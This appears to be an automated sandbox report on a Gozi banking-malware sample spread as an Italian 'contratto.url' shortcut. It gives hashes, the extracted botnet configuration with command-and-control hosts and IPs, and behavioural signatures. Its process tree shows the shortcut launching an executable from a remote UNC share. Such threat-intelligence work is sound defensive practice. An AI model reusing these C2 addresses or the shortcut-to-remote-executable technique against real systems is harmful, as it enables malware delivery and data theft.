Analysis
-
max time kernel
121s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-01-2023 10:35
Static task
static1
Behavioral task
behavioral1
Sample
contratto/contratto.url
Resource
win7-20221111-en
windows7-x64
1 signatures
150 seconds
General
-
Target
contratto/contratto.url
-
Size
196B
-
MD5
582020c54921b9635ea54ddefbf44431
-
SHA1
4e6e4537fd7c4de2a664e559c08fe2142adb8319
-
SHA256
c66981ec7d3867d2481ac3ba2cd40f63fdc29782de6d6cbc88fff9376d71d1d3
-
SHA512
df7d2e19d905bb00024c225d1bd83a4fd8617b9e23d5726721a05201b438f7ce9254b56fc7a4f58843faf174f5d71f351750ea6e7ea7fa11e3cc66b442715cf4
Malware Config
Extracted
Family
gozi
Extracted
Family
gozi
Botnet
7707
C2
checklist.skype.com
62.173.149.10
31.41.44.27
193.0.178.235
Attributes
-
base_path
/drew/
-
build
250250
-
exe_type
loader
-
extension
.jlk
-
server_id
50
rsa_pubkey.plain
aes.plain
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1948 wrote to memory of 4936 1948 rundll32.exe 81 PID 1948 wrote to memory of 4936 1948 rundll32.exe 81 PID 1948 wrote to memory of 4936 1948 rundll32.exe 81
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\contratto\contratto.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1948 -
\??\UNC\193.233.175.99\Agenzia\scarica.exe"\\193.233.175.99\Agenzia\scarica.exe"2⤵PID:4936
-